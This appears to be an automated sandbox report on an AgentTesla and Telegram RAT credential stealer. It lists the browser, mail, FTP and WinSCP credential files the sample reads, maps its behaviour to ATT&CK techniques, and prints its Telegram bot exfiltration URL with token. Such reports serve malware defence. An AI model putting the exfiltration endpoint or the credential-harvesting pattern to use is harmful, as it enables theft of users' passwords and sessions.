Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4c3df80.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4e04d90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.38f2df0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.3836e40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4e04d90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.38f2df0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.3836e40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4c3df80.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2351049969.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2275950717.0000000003836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123371459.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123371459.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IUqsn1SBGy.exe PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7724, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IUqsn1SBGy.exe PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7724, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IUqsn1SBGy.exe PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7724, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4c3df80.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4e04d90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.38f2df0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.3836e40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4e04d90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.38f2df0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AppPoint.exe.3836e40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4c3df80.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2351049969.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2275950717.0000000003836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123371459.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123371459.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IUqsn1SBGy.exe PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7724, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IUqsn1SBGy.exe PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppPoint.exe PID: 7724, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	112 Process Injection	2 Obfuscated Files or Information	11 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Software Packing	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	211 Security Software Discovery	Distributed Component Object Model	11 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	151 Virtualization/Sandbox Evasion	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	112 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IUqsn1SBGy.exe	50%	Virustotal		Browse
IUqsn1SBGy.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
IUqsn1SBGy.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook

Source	Detection	Scanner	Label	Link
http://api.telegram.orgh	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.libertyreserve.com/beta/xml/transfer.aspx	AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, AppPoint.exe.5.dr	false		high
https://api.telegram.org	IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C0B000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.00000000029FB000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.libertyreserve.com/beta/xml/history.aspx	IUqsn1SBGy.exe, AppPoint.exe.5.dr	false		high
https://api.libertyreserve.com/beta/xml/history.aspxS	AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C0B000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CC3000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.00000000029FB000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.orgh	IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CC3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sci.libertyreserve.com/	IUqsn1SBGy.exe, AppPoint.exe.5.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	IUqsn1SBGy.exe, 00000000.00000002.2121820572.0000000003341000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 00000008.00000002.2274943867.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.libertyreserve.com/beta/xml/accountname.aspx	AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, AppPoint.exe.5.dr	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	IUqsn1SBGy.exe, AppPoint.exe.5.dr	false		high
https://api.libertyreserve.com/beta/xml/balance.aspx	AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, AppPoint.exe.5.dr	false		high
https://api.libertyreserve.com/beta/xml/	IUqsn1SBGy.exe, AppPoint.exe.5.dr	false		high
https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/	IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587684
Start date and time:	2025-01-10 16:52:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	IUqsn1SBGy.exe renamed because original name is a hash value
Original Sample Name:	2e31bfbc51607f142e0413db74ced776bb207448c052b9363250d2b93e718431.exe
Detection:	MAL
